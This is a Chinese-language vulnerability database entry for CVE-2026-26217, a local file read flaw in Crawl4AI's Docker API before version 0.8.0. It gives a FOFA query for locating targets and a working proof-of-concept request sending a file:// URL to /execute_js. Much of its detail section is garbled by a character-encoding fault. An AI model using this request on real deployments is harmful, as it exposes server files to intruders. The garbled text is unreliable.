momo安全漏洞库

多模块数据检索平台

登录 注册
返回列表

execute_js 服务器端请求伪造漏洞(CVE-2026-26217)

CVE: CVE-2026-26217
CNVD: 暂无
CNNVD: 暂无
漏洞类型: 命令执行
漏洞等级: 高危
年份: 2026
POC_ID: 94496
漏洞描述
Crawl4AI 是一个开源的 AI 爬虫工具。Crawl4AI 0.8.0 版本之前在 Docker API 部署中存在本地文件包含漏洞。攻击者可以通过 /execute_js、/screenshot、/pdf 和 /html 端点传入 file:// 协议的 URL,从而读取服务器文件系统上的任意文件(如 /etc/passwd)。
FOFA 语句
系统自动生成(不一定准确):title="execute_js 服务器端请求伪造"
影响范围
Crawl4AI
漏洞详情
Crawl4AI /execute_js 鏈嶅姟鍣ㄧ璇锋眰浼�犳紡娲烇紙CVE-2026-26217锛� 鏃ユ湡: 2026-02-27 | 褰卞搷杞欢: Crawl4AI | POC: 宸插叕寮� 婕忔礊鎻忚堪 Crawl4AI 鏄竴涓紑婧愮殑 AI 鐖櫕宸ュ叿銆侰rawl4AI 0.8.0 鐗堟湰涔嬪墠鍦� Docker API 閮ㄧ讲涓瓨鍦ㄦ湰鍦版枃浠跺寘鍚紡娲炪�傛敾鍑昏�呭彲浠ラ�氳繃 /execute_js銆�/screenshot銆�/pdf 鍜� /html 绔偣浼犲叆 file:// 鍗忚鐨� URL锛屼粠鑰岃鍙栨湇鍔″櫒鏂囦欢绯荤粺涓婄殑浠绘剰鏂囦欢锛堝 /etc/passwd锛夈�� PoC浠g爜 澶嶅埗 POST /execute_js HTTP/1.1 Host: Content-Type: application/json Content-Length: 74 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 {"url":"file:///c:/windows/win.ini","scripts":["document.body.innerText"]} 鐩稿叧婕忔礊鎺ㄨ崘 Crawl4AI /crawl hooks 浠g爜鎵ц婕忔礊锛圕VE-2026-26216锛� POC CVE-2020-26217: XStream <1.4.14 - Remote Code Execution
漏洞 POC
登录后可查看漏洞 POC。请先 登录注册
修复建议
暂无